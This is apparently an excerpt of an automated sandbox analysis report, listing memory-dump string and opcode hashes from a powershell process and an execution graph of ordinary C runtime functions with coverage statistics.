                                                                                • Instruction Fuzzy Hash: 4F51E3F0616206DBDF2ACE35E5047A6BBB2BF46391F148876E8014B290C735ED90CBB1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2493541041.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7790000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (fnl$(fnl$4'{q$4kl$tL`k
                                                                                • API String ID: 0-3077502612
                                                                                • Opcode ID: 3c9e7d953d70121966ff724166d4cd591b8c061a12974b8f5bd46439d154fa9f
                                                                                • Instruction ID: 095f1ce6359f3a561e95226e84845d72719f18e8c5d23a5b360d2c2929bf8dcd
                                                                                • Opcode Fuzzy Hash: 3c9e7d953d70121966ff724166d4cd591b8c061a12974b8f5bd46439d154fa9f
                                                                                • Instruction Fuzzy Hash: F95182B0B06205DFDB28CF58D440AAABBF2BF89354F18887AD4056B355CB76EC41CB95
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2493541041.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7790000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ${q$${q$${q$dl$dl
                                                                                • API String ID: 0-2529990613
                                                                                • Opcode ID: 2517d401d6455373222ab247bff7211febe0873f648249a747055d2994d8aaae
                                                                                • Instruction ID: ecf8d048567341ba8f3059221bf612a241abc7b45a801526121d365abf4f648b
                                                                                • Opcode Fuzzy Hash: 2517d401d6455373222ab247bff7211febe0873f648249a747055d2994d8aaae
                                                                                • Instruction Fuzzy Hash: 3D11E9B13173069BDF385A1EA802B26F79AABC16A0F25C83AA44587340CB75D881C351
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2493541041.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7790000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (o{q$(o{q$(o{q$(o{q
                                                                                • API String ID: 0-1511695546
                                                                                • Opcode ID: 7a0812dd6dd54a6637f3ab0ec6aa31a6001a1cf9531d1ed8e501bca472825121
                                                                                • Instruction ID: c04f512e90a9b7469fd77437603a6f326366d29dbcde271eee199170d3419adf
                                                                                • Opcode Fuzzy Hash: 7a0812dd6dd54a6637f3ab0ec6aa31a6001a1cf9531d1ed8e501bca472825121
                                                                                • Instruction Fuzzy Hash: 44F117B1709205DFDF168F78E8417AABBA2EF85350F14887AE5058B291DB35D881CB71
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2493541041.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7790000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 84ll$84ll$tP{q$tP{q
                                                                                • API String ID: 0-192643410
                                                                                • Opcode ID: eb24f237c2b01a8b936fc28ee721db50c6b51c248754cde7032f6b62e10d9223
                                                                                • Instruction ID: ce0082a6eb88be3ed9505b99adb76b9e1226659326e80d53b4bc6f9aaec46951
                                                                                • Opcode Fuzzy Hash: eb24f237c2b01a8b936fc28ee721db50c6b51c248754cde7032f6b62e10d9223
                                                                                • Instruction Fuzzy Hash: A4A19EB17052129FCF268B78E84067ABBA6AF81350F28887AD806CB3D1DB35DC50C761
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2493541041.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7790000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (fnl$(fnl$(fnl$(fnl
                                                                                • API String ID: 0-373597420
                                                                                • Opcode ID: 24c365febec733db44108b52cc00e02258f3b72e3ee303962df39264bdf9c78a
                                                                                • Instruction ID: af4bea6cc71e61403d88558ce18758dce1b5eca6847f8ada48927891566f2efb
                                                                                • Opcode Fuzzy Hash: 24c365febec733db44108b52cc00e02258f3b72e3ee303962df39264bdf9c78a
                                                                                • Instruction Fuzzy Hash: 7CA19FF0E12606DBDF24CF54D840A6AB7B2BF88794F14CA3AD805AB744D772E841CB90
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2493541041.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7790000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (fnl$(fnl$(fnl$(fnl
                                                                                • API String ID: 0-373597420
                                                                                • Opcode ID: df47c2e7eed88822b8ad272677123c5d3367d744ecf677a27028f5c9b0b6ad06
                                                                                • Instruction ID: ba070857dec7072ebcf34476ebc3429fb95e386b5c8e2edf1631b44e8be4d200
                                                                                • Opcode Fuzzy Hash: df47c2e7eed88822b8ad272677123c5d3367d744ecf677a27028f5c9b0b6ad06
                                                                                • Instruction Fuzzy Hash: 24718FB0A22105DFDB18CF68D841EAABBB2EF89354F148579D805AB715CB31DC41CBA5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2493541041.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7790000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'{q$84ll$tP{q$${q
                                                                                • API String ID: 0-2688964588
                                                                                • Opcode ID: cd700a0c2e3c28472c5244f6aa1fbf9aa9a7d40b70919107bddb04c916008b4c
                                                                                • Instruction ID: 965dff8b870332485657dd951cf70ab01b30e1bc2ff9703d08ed283fb8e04e33
                                                                                • Opcode Fuzzy Hash: cd700a0c2e3c28472c5244f6aa1fbf9aa9a7d40b70919107bddb04c916008b4c
                                                                                • Instruction Fuzzy Hash: 095106B160A346DFDF268F34E550AB9BBE2AF45394F1888B6E9009B251D735DC40CBB1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2493541041.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7790000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ${q$${q$${q$${q
                                                                                • API String ID: 0-2861779892
                                                                                • Opcode ID: fe594b9fc7d08190c6fe7602b263a8c31dc73540b013b39ff2e60f54bf56dda2
                                                                                • Instruction ID: e4f694ac37843cff4744863d362afaa34fc42c7fbed2b6bf37f966c013c399ff
                                                                                • Opcode Fuzzy Hash: fe594b9fc7d08190c6fe7602b263a8c31dc73540b013b39ff2e60f54bf56dda2
                                                                                • Instruction Fuzzy Hash: 592107B232520B9FEF38757AA800B27B6969FC4755F24883AA545CB381DE79D841C361
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2493541041.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7790000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'{q$4'{q$${q$${q
                                                                                • API String ID: 0-759126228
                                                                                • Opcode ID: a02234109dfb8fdf300c26cf68b133109b2667669ddd2a0a8b7e174787da6ff7
                                                                                • Instruction ID: 6abed053bec55e019a5bd58d4ab918ab03624b5a1221fdf033e1696502f7dbee
                                                                                • Opcode Fuzzy Hash: a02234109dfb8fdf300c26cf68b133109b2667669ddd2a0a8b7e174787da6ff7
                                                                                • Instruction Fuzzy Hash: 37019E5172F3C65FDB2B12282820165AF765B8756072A44EBC085CF393CA186C46C77B

                                                                                Execution Graph

                                                                                Execution Coverage:1.8%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:2.7%
                                                                                Total number of Nodes:1657
                                                                                Total number of Limit Nodes:1
                                                                                execution_graph 7141 2a8742b 7142 2a87430 7141->7142 7144 2a87453 7142->7144 7145 2a88bae 7142->7145 7146 2a88bbb 7145->7146 7150 2a88bdd 7145->7150 7147 2a88bc9 RtlDeleteCriticalSection 7146->7147 7148 2a88bd7 7146->7148 7147->7147 7147->7148 7149 2a8571e _free 20 API calls 7148->7149 7149->7150 7150->7142 7200 2a8ac6b 7201 2a8ac84 __startOneArgErrorHandling 7200->7201 7203 2a8acad __startOneArgErrorHandling 7201->7203 7204 2a8b2f0 7201->7204 7205 2a8b329 __startOneArgErrorHandling 7204->7205 7207 2a8b350 __startOneArgErrorHandling 7205->7207 7215 2a8b5c1 7205->7215 7208 2a8b393 7207->7208 7209 2a8b36e 7207->7209 7228 2a8b8b2 7208->7228 7219 2a8b8e1 7209->7219 7212 2a8b38e __startOneArgErrorHandling 7213 2a82ada _ValidateLocalCookies 5 API calls 7212->7213 7214 2a8b3b7 7213->7214 7214->7203 7216 2a8b5ec __raise_exc 7215->7216 7217 2a8b7e5 RaiseException 7216->7217 7218 2a8b7fd 7217->7218 7218->7207 7220 2a8b8f0 7219->7220 7221 2a8b90f __startOneArgErrorHandling 7220->7221 7222 2a8b964 __startOneArgErrorHandling 7220->7222 7235 2a878a3 7221->7235 7224 2a8b8b2 __startOneArgErrorHandling 20 API calls 7222->7224 7227 2a8b95d 7224->7227 7226 2a8b8b2 __startOneArgErrorHandling 20 API calls 7226->7227 7227->7212 7229 2a8b8bf 7228->7229 7230 2a8b8d4 7228->7230 7231 2a8b8d9 7229->7231 7233 2a86368 _free 20 API calls 7229->7233 7232 2a86368 _free 20 API calls 7230->7232 7231->7212 7232->7231 7234 2a8b8cc 7233->7234 7234->7212 7237 2a878cb 7235->7237 7236 2a82ada _ValidateLocalCookies 5 API calls 7238 2a878e8 7236->7238 7237->7236 7238->7226 7238->7227 6355 2a860ac 6356 2a860b7 6355->6356 6358 2a860dd 6355->6358 6357 2a860c7 FreeLibrary 6356->6357 6356->6358 6357->6356 7239 2a8506f 7240 2a85087 7239->7240 7241 2a85081 7239->7241 7242 2a85000 20 API calls 7241->7242 7242->7240 7243 2a87260 GetStartupInfoW 7244 2a87318 7243->7244 7245 2a87286 7243->7245 7245->7244 7249 2a88be3 7245->7249 7247 2a872af 7247->7244 7248 2a872dd GetFileType 7247->7248 7248->7247 7250 2a88bef ___DestructExceptionObject 7249->7250 7251 2a88bfc 7250->7251 7252 2a88c13 7250->7252 7253 2a86368 _free 20 API calls 7251->7253 7262 2a85671 RtlEnterCriticalSection 7252->7262 7255 2a88c01 7253->7255 7256 2a862ac ___std_exception_copy 26 API calls 7255->7256 7258 2a88c0b _abort 7256->7258 7257 2a88c4b 7270 2a88c72 7257->7270 7258->7247 7259 2a88c1f 7259->7257 7263 2a88b34 7259->7263 7262->7259 7264 2a8637b __dosmaperr 20 API calls 7263->7264 7265 2a88b46 7264->7265 7268 2a85eb7 11 API calls 7265->7268 7269 2a88b53 7265->7269 7266 2a8571e _free 20 API calls 7267 2a88ba5 7266->7267 7267->7259 7268->7265 7269->7266 7273 2a856b9 RtlLeaveCriticalSection 7270->7273 7272 2a88c79 7272->7258 7273->7272 7404 2a881a0 7405 2a881d9 7404->7405 7406 2a881dd 7405->7406 7417 2a88205 7405->7417 7407 2a86368 _free 20 API calls 7406->7407 7408 2a881e2 7407->7408 7410 2a862ac ___std_exception_copy 26 API calls 7408->7410 7409 2a88529 7411 2a82ada _ValidateLocalCookies 5 API calls 7409->7411 7412 2a881ed 7410->7412 7413 2a88536 7411->7413 7414 2a82ada _ValidateLocalCookies 5 API calls 7412->7414 7415 2a881f9 7414->7415 7417->7409 7418 2a880c0 7417->7418 7419 2a880db 7418->7419 7420 2a82ada _ValidateLocalCookies 5 API calls 7419->7420 7421 2a88152 7420->7421 7421->7417 7490 2a8a1e0 7493 2a8a1fe 7490->7493 7492 2a8a1f6 7494 2a8a203 7493->7494 7495 2a8a298 7494->7495 7496 2a8aa53 21 API calls 7494->7496 7495->7492 7497 2a8a42f 7496->7497 7497->7492 7422 2a821a1 ___scrt_dllmain_exception_filter 7747 2a89d61 7748 2a89d81 7747->7748 7751 2a89db8 7748->7751 7750 2a89dab 7752 2a89dbf 7751->7752 7753 2a89e20 7752->7753 7754 2a89ddf 7752->7754 7756 2a8a90e 7753->7756 7760 2a8aa17 7753->7760 7754->7756 7758 2a8aa17 21 API calls 7754->7758 7756->7750 7759 2a8a93e 7758->7759 7759->7750 7761 2a8aa20 7760->7761 7764 2a8b19b 7761->7764 7765 2a8b1da __startOneArgErrorHandling 7764->7765 7770 2a8b25c __startOneArgErrorHandling 7765->7770 7774 2a8b59e 7765->7774 7767 2a8b286 7768 2a8b8b2 __startOneArgErrorHandling 20 API calls 7767->7768 7769 2a8b292 7767->7769 7768->7769 7772 2a82ada _ValidateLocalCookies 5 API calls 7769->7772 7770->7767 7771 2a878a3 __startOneArgErrorHandling 5 API calls 7770->7771 7771->7767 7773 2a89e6e 7772->7773 7773->7750 7775 2a8b5c1 __raise_exc RaiseException 7774->7775 7776 2a8b5bc 7775->7776 7776->7770 7423 2a8c7a7 7424 2a8c7be 7423->7424 7431 2a8c80d 7423->7431 7424->7431 7432 2a8c7e6 GetModuleHandleA 7424->7432 7425 2a8c872 7426 2a8c835 GetModuleHandleA 7426->7431 7429 2a8c85f GetProcAddress 7429->7431 7431->7425 7431->7426 7431->7429 7433 2a8c7ef 7432->7433 7439 2a8c80d 7432->7439 7441 2a8c803 GetProcAddress 7433->7441 7436 2a8c872 7437 2a8c835 GetModuleHandleA 7437->7439 7439->7436 7439->7437 7440 2a8c85f GetProcAddress 7439->7440 7440->7439 7445 2a8c80d 7441->7445 7442 2a8c872 7443 2a8c835 GetModuleHandleA 7443->7445 7444 2a8c85f GetProcAddress 7444->7445 7445->7442 7445->7443 7445->7444 7151 2a8543d 7152 2a85440 7151->7152 7153 2a855a8 _abort 38 API calls 7152->7153 7154 2a8544c 7153->7154 7446 2a867bf 7451 2a867f4 7446->7451 7449 2a8571e _free 20 API calls 7450 2a867db 7449->7450 7452 2a867cd 7451->7452 7453 2a86806 7451->7453 7452->7449 7452->7450 7454 2a8680b 7453->7454 7455 2a86836 7453->7455 7456 2a8637b __dosmaperr 20 API calls 7454->7456 7455->7452 7462 2a871d6 7455->7462 7457 2a86814 7456->7457 7459 2a8571e _free 20 API calls 7457->7459 7459->7452 7460 2a86851 7461 2a8571e _free 20 API calls 7460->7461 7461->7452 7463 2a871e1 7462->7463 7464 2a87209 7463->7464 7465 2a871fa 7463->7465 7466 2a87218 7464->7466 7471 2a88a98 7464->7471 7467 2a86368 _free 20 API calls 7465->7467 7478 2a88acb 7466->7478 7470 2a871ff ___scrt_fastfail 7467->7470 7470->7460 7472 2a88ab8 RtlSizeHeap 7471->7472 7473 2a88aa3 7471->7473 7472->7466 7474 2a86368 _free 20 API calls 7473->7474 7475 2a88aa8 7474->7475 7476 2a862ac ___std_exception_copy 26 API calls 7475->7476 7477 2a88ab3 7476->7477 7477->7466 7479 2a88ad8 7478->7479 7480 2a88ae3 7478->7480 7481 2a856d0 21 API calls 7479->7481 7482 2a88aeb 7480->7482 7488 2a88af4 __dosmaperr 7480->7488 7486 2a88ae0 7481->7486 7483 2a8571e _free 20 API calls 7482->7483 7483->7486 7484 2a88af9 7487 2a86368 _free 20 API calls 7484->7487 7485 2a88b1e RtlReAllocateHeap 7485->7486 7485->7488 7486->7470 7487->7486 7488->7484 7488->7485 7489 2a8474f __dosmaperr 7 API calls 7488->7489 7489->7488 7498 2a85bff 7506 2a85d5c 7498->7506 7501 2a85b7a __dosmaperr 20 API calls 7502 2a85c1b 7501->7502 7503 2a85c28 7502->7503 7504 2a85c2b 11 API calls 7502->7504 7505 2a85c13 7504->7505 7507 2a85c45 __dosmaperr 5 API calls 7506->7507 7508 2a85d83 7507->7508 7509 2a85d9b TlsAlloc 7508->7509 7512 2a85d8c 7508->7512 7509->7512 7510 2a82ada _ValidateLocalCookies 5 API calls 7511 2a85c09 7510->7511 7511->7501 7511->7505 7512->7510 7641 2a81f3f 7642 2a81f4b ___DestructExceptionObject 7641->7642 7659 2a8247c 7642->7659 7644 2a81f57 ___scrt_is_nonwritable_in_current_image 7645 2a81f52 7645->7644 7646 2a81f7c 7645->7646 7647 2a82041 7645->7647 7670 2a823de 7646->7670 7649 2a82639 ___scrt_fastfail 4 API calls 7647->7649 7650 2a82048 7649->7650 7651 2a81f8b __RTC_Initialize 7651->7644 7673 2a822fc RtlInitializeSListHead 7651->7673 7653 2a81f99 ___scrt_initialize_default_local_stdio_options 7674 2a846c5 7653->7674 7657 2a81fb8 7657->7644 7658 2a84669 _abort 5 API calls 7657->7658 7658->7644 7660 2a82485 7659->7660 7682 2a82933 IsProcessorFeaturePresent 7660->7682 7664 2a82496 7669 2a8249a 7664->7669 7693 2a853c8 7664->7693 7667 2a824b1 7667->7645 7668 2a83529 ___vcrt_uninitialize 8 API calls 7668->7669 7669->7645 7724 2a824b5 7670->7724 7672 2a823e5 7672->7651 7673->7653 7675 2a846dc 7674->7675 7676 2a82ada _ValidateLocalCookies 5 API calls 7675->7676 7677 2a81fad 7676->7677 7677->7644 7678 2a823b3 7677->7678 7679 2a823b8 ___scrt_release_startup_lock 7678->7679 7680 2a82933 ___isa_available_init IsProcessorFeaturePresent 7679->7680 7681 2a823c1 7679->7681 7680->7681 7681->7657 7683 2a82491 7682->7683 7684 2a834ea 7683->7684 7685 2a834ef ___vcrt_initialize_winapi_thunks 7684->7685 7696 2a83936 7685->7696 7689 2a83505 7690 2a83510 7689->7690 7691 2a83972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7689->7691 7690->7664 7692 2a834fd 7691->7692 7692->7664 7720 2a87457 7693->7720 7697 2a8393f 7696->7697 7699 2a83968 7697->7699 7701 2a834f9 7697->7701 7710 2a83be0 7697->7710 7700 2a83972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7699->7700 7700->7701 7701->7692 7702 2a838e8 7701->7702 7715 2a83af1 7702->7715 7705 2a83ba2 ___vcrt_FlsSetValue 6 API calls 7706 2a8390b 7705->7706 7707 2a83918 7706->7707 7708 2a8391b ___vcrt_uninitialize_ptd 6 API calls 7706->7708 7707->7689 7709 2a838fd 7708->7709 7709->7689 7711 2a83a82 try_get_function 5 API calls 7710->7711 7712 2a83bfa 7711->7712 7713 2a83c18 InitializeCriticalSectionAndSpinCount 7712->7713 7714 2a83c03 7712->7714 7713->7714 7714->7697 7716 2a83a82 try_get_function 5 API calls 7715->7716 7717 2a83b0b 7716->7717 7718 2a83b24 TlsAlloc 7717->7718 7719 2a838f2 7717->7719 7719->7705 7719->7709 7723 2a87470 7720->7723 7721 2a82ada _ValidateLocalCookies 5 API calls 7722 2a824a3 7721->7722 7722->7667 7722->7668 7723->7721 7725 2a824c8 7724->7725 7726 2a824c4 7724->7726 7727 2a82639 ___scrt_fastfail 4 API calls 7725->7727 7729 2a824d5 ___scrt_release_startup_lock 7725->7729 7726->7672 7728 2a82559 7727->7728 7729->7672 7155 2a85630 7156 2a8563b 7155->7156 7157 2a85eb7 11 API calls 7156->7157 7158 2a85664 7156->7158 7159 2a85660 7156->7159 7157->7156 7161 2a85688 7158->7161 7162 2a856b4 7161->7162 7163 2a85695 7161->7163 7162->7159 7164 2a8569f RtlDeleteCriticalSection 7163->7164 7164->7162 7164->7164 7513 2a863f0 7514 2a86400 7513->7514 7523 2a86416 7513->7523 7515 2a86368 _free 20 API calls 7514->7515 7516 2a86405 7515->7516 7517 2a862ac ___std_exception_copy 26 API calls 7516->7517 7528 2a8640f 7517->7528 7519 2a86480 7519->7519 7543 2a84e76 7519->7543 7520 2a864e5 7522 2a864ee 7520->7522 7529 2a86573 7520->7529 7549 2a885eb 7520->7549 7524 2a8571e _free 20 API calls 7522->7524 7523->7519 7525 2a86561 7523->7525 7532 2a86580 7523->7532 7524->7525 7558 2a8679a 7525->7558 7530 2a862bc ___std_exception_copy 11 API calls 7529->7530 7531 2a8657f 7530->7531 7533 2a8658c 7532->7533 7533->7533 7534 2a8637b __dosmaperr 20 API calls 7533->7534 7535 2a865ba 7534->7535 7536 2a885eb 26 API calls 7535->7536 7537 2a865e6 7536->7537 7538 2a862bc ___std_exception_copy 11 API calls 7537->7538 7539 2a86615 ___scrt_fastfail 7538->7539 7540 2a866b6 FindFirstFileExA 7539->7540 7541 2a86705 7540->7541 7542 2a86580 26 API calls 7541->7542 7544 2a84e8b 7543->7544 7545 2a84e87 7543->7545 7544->7545 7546 2a8637b __dosmaperr 20 API calls 7544->7546 7545->7520 7547 2a84eb9 7546->7547 7548 2a8571e _free 20 API calls 7547->7548 7548->7545 7553 2a8853a 7549->7553 7550 2a8854f 7551 2a86368 _free 20 API calls 7550->7551 7552 2a88554 7550->7552 7554 2a8857a 7551->7554 7552->7520 7553->7550 7553->7552 7556 2a8858b 7553->7556 7555 2a862ac ___std_exception_copy 26 API calls 7554->7555 7555->7552 7556->7552 7557 2a86368 _free 20 API calls 7556->7557 7557->7554 7559 2a867a4 7558->7559 7560 2a867b4 7559->7560 7561 2a8571e _free 20 API calls 7559->7561 7562 2a8571e _free 20 API calls 7560->7562 7561->7559 7563 2a867bb 7562->7563 7563->7528 7777 2a83370 7788 2a83330 7777->7788 7789 2a8334f 7788->7789 7790 2a83342 7788->7790 7791 2a82ada _ValidateLocalCookies 5 API calls 7790->7791 7791->7789 7274 2a89e71 7275 2a89e95 7274->7275 7276 2a89eae 7275->7276 7279 2a8ac6b __startOneArgErrorHandling 7275->7279 7280 2a89ef8 7276->7280 7282 2a8aa53 7276->7282 7277 2a8acad __startOneArgErrorHandling 7279->7277 7281 2a8b2f0 21 API calls 7279->7281 7281->7277 7283 2a8aa70 RtlDecodePointer 7282->7283 7285 2a8aa80 7282->7285 7283->7285 7284 2a82ada _ValidateLocalCookies 5 API calls 7287 2a8ac67 7284->7287 7286 2a8ab0d 7285->7286 7288 2a8ab02 7285->7288 7290 2a8aab7 7285->7290 7286->7288 7289 2a86368 _free 20 API calls 7286->7289 7287->7280 7288->7284 7289->7288 7290->7288 7291 2a86368 _free 20 API calls 7290->7291 7291->7288 6363 2a83eb3 6366 2a85411 6363->6366 6367 2a8541d _abort 6366->6367 6372 2a85af6 GetLastError 6367->6372 6371 2a85422 6392 2a855a8 6371->6392 6373 2a85b12 6372->6373 6374 2a85b0c 6372->6374 6376 2a8637b __dosmaperr 20 API calls 6373->6376 6378 2a85b61 SetLastError 6373->6378 6375 2a85e08 __dosmaperr 11 API calls 6374->6375 6375->6373 6377 2a85b24 6376->6377 6379 2a85b2c 6377->6379 6380 2a85e5e __dosmaperr 11 API calls 6377->6380 6378->6371 6382 2a8571e _free 20 API calls 6379->6382 6381 2a85b41 6380->6381 6381->6379 6383 2a85b48 6381->6383 6384 2a85b32 6382->6384 6386 2a8593c __dosmaperr 20 API calls 6383->6386 6385 2a85b6d SetLastError 6384->6385 6388 2a855a8 _abort 35 API calls 6385->6388 6387 2a85b53 6386->6387 6389 2a8571e _free 20 API calls 6387->6389 6390 2a85b79 6388->6390 6391 2a85b5a 6389->6391 6391->6378 6391->6385 6403 2a87613 6392->6403 6395 2a855b8 6397 2a855c2 IsProcessorFeaturePresent 6395->6397 6398 2a855e0 6395->6398 6399 2a855cd 6397->6399 6439 2a84bc1 6398->6439 6433 2a860e2 6399->6433 6442 2a87581 6403->6442 6406 2a8766e 6407 2a8767a _abort 6406->6407 6408 2a85b7a __dosmaperr 20 API calls 6407->6408 6413 2a876a7 _abort 6407->6413 6416 2a876a1 _abort 6407->6416 6408->6416 6409 2a876f3 6411 2a86368 _free 20 API calls 6409->6411 6410 2a876d6 6468 2a8bdc9 6410->6468 6412 2a876f8 6411->6412 6456 2a862ac 6412->6456 6419 2a8771f 6413->6419 6459 2a85671 RtlEnterCriticalSection 6413->6459 6416->6409 6416->6410 6416->6413 6421 2a8777e 6419->6421 6423 2a87776 6419->6423 6429 2a877a9 6419->6429 6460 2a856b9 RtlLeaveCriticalSection 6419->6460 6421->6429 6461 2a87665 6421->6461 6424 2a84bc1 _abort 28 API calls 6423->6424 6424->6421 6427 2a85af6 _abort 38 API calls 6431 2a8780c 6427->6431 6464 2a8782e 6429->6464 6430 2a87665 _abort 38 API calls 6430->6429 6431->6410 6432 2a85af6 _abort 38 API calls 6431->6432 6432->6410 6434 2a860fe ___scrt_fastfail 6433->6434 6435 2a8612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6434->6435 6436 2a861fb ___scrt_fastfail 6435->6436 6437 2a82ada _ValidateLocalCookies 5 API calls 6436->6437 6438 2a86219 6437->6438 6438->6398 6487 2a8499b 6439->6487 6445 2a87527 6442->6445 6444 2a855ad 6444->6395 6444->6406 6446 2a87533 ___DestructExceptionObject 6445->6446 6451 2a85671 RtlEnterCriticalSection 6446->6451 6448 2a87541 6452 2a87575 6448->6452 6450 2a87568 _abort 6450->6444 6451->6448 6455 2a856b9 RtlLeaveCriticalSection 6452->6455 6454 2a8757f 6454->6450 6455->6454 6471 2a86231 6456->6471 6458 2a862b8 6458->6410 6459->6419 6460->6423 6462 2a85af6 _abort 38 API calls 6461->6462 6463 2a8766a 6462->6463 6463->6430 6465 2a87834 6464->6465 6467 2a877fd 6464->6467 6486 2a856b9 RtlLeaveCriticalSection 6465->6486 6467->6410 6467->6427 6467->6431 6469 2a82ada _ValidateLocalCookies 5 API calls 6468->6469 6470 2a8bdd4 6469->6470 6470->6470 6472 2a85b7a __dosmaperr 20 API calls 6471->6472 6473 2a86247 6472->6473 6474 2a862a6 6473->6474 6477 2a86255 6473->6477 6482 2a862bc IsProcessorFeaturePresent 6474->6482 6476 2a862ab 6478 2a86231 ___std_exception_copy 26 API calls 6476->6478 6479 2a82ada _ValidateLocalCookies 5 API calls 6477->6479 6480 2a862b8 6478->6480 6481 2a8627c 6479->6481 6480->6458 6481->6458 6483 2a862c7 6482->6483 6484 2a860e2 _abort 8 API calls 6483->6484 6485 2a862dc GetCurrentProcess TerminateProcess 6484->6485 6485->6476 6486->6467 6488 2a849a7 _abort 6487->6488 6489 2a849bf 6488->6489 6509 2a84af5 GetModuleHandleW 6488->6509 6518 2a85671 RtlEnterCriticalSection 6489->6518 6493 2a84a65 6526 2a84aa5 6493->6526 6497 2a84a3c 6498 2a84a54 6497->6498 6522 2a84669 6497->6522 6504 2a84669 _abort 5 API calls 6498->6504 6499 2a849c7 6499->6493 6499->6497 6519 2a8527a 6499->6519 6500 2a84aae 6502 2a8bdc9 _abort 5 API calls 6500->6502 6501 2a84a82 6529 2a84ab4 6501->6529 6507 2a84ab3 6502->6507 6504->6493 6510 2a849b3 6509->6510 6510->6489 6511 2a84b39 GetModuleHandleExW 6510->6511 6512 2a84b63 GetProcAddress 6511->6512 6513 2a84b78 6511->6513 6512->6513 6514 2a84b8c FreeLibrary 6513->6514 6515 2a84b95 6513->6515 6514->6515 6516 2a82ada _ValidateLocalCookies 5 API calls 6515->6516 6517 2a84b9f 6516->6517 6517->6489 6518->6499 6537 2a85132 6519->6537 6523 2a84698 6522->6523 6524 2a82ada _ValidateLocalCookies 5 API calls 6523->6524 6525 2a846c1 6524->6525 6525->6498 6559 2a856b9 RtlLeaveCriticalSection 6526->6559 6528 2a84a7e 6528->6500 6528->6501 6560 2a86025 6529->6560 6532 2a84ae2 6535 2a84b39 _abort 8 API calls 6532->6535 6533 2a84ac2 GetPEB 6533->6532 6534 2a84ad2 GetCurrentProcess TerminateProcess 6533->6534 6534->6532 6536 2a84aea ExitProcess 6535->6536 6540 2a850e1 6537->6540 6539 2a85156 6539->6497 6541 2a850ed ___DestructExceptionObject 6540->6541 6548 2a85671 RtlEnterCriticalSection 6541->6548 6543 2a850fb 6549 2a8515a 6543->6549 6547 2a85119 _abort 6547->6539 6548->6543 6552 2a85182 6549->6552 6553 2a8517a 6549->6553 6550 2a82ada _ValidateLocalCookies 5 API calls 6551 2a85108 6550->6551 6555 2a85126 6551->6555 6552->6553 6554 2a8571e _free 20 API calls 6552->6554 6553->6550 6554->6553 6558 2a856b9 RtlLeaveCriticalSection 6555->6558 6557 2a85130 6557->6547 6558->6557 6559->6528 6561 2a8604a 6560->6561 6562 2a86040 6560->6562 6563 2a85c45 __dosmaperr 5 API calls 6561->6563 6564 2a82ada _ValidateLocalCookies 5 API calls 6562->6564 6563->6562 6565 2a84abe 6564->6565 6565->6532 6565->6533 7792 2a85348 7793 2a83529 ___vcrt_uninitialize 8 API calls 7792->7793 7794 2a8534f 7793->7794 7795 2a87b48 7805 2a88ebf 7795->7805 7799 2a87b55 7818 2a8907c 7799->7818 7802 2a87b7f 7803 2a8571e _free 20 API calls 7802->7803 7804 2a87b8a 7803->7804 7822 2a88ec8 7805->7822 7807 2a87b50 7808 2a88fdc 7807->7808 7809 2a88fe8 ___DestructExceptionObject 7808->7809 7842 2a85671 RtlEnterCriticalSection 7809->7842 7811 2a8905e 7856 2a89073 7811->7856 7812 2a88ff3 7812->7811 7814 2a89032 RtlDeleteCriticalSection 7812->7814 7843 2a8a09c 7812->7843 7817 2a8571e _free 20 API calls 7814->7817 7815 2a8906a _abort 7815->7799 7817->7812 7819 2a89092 7818->7819 7820 2a87b64 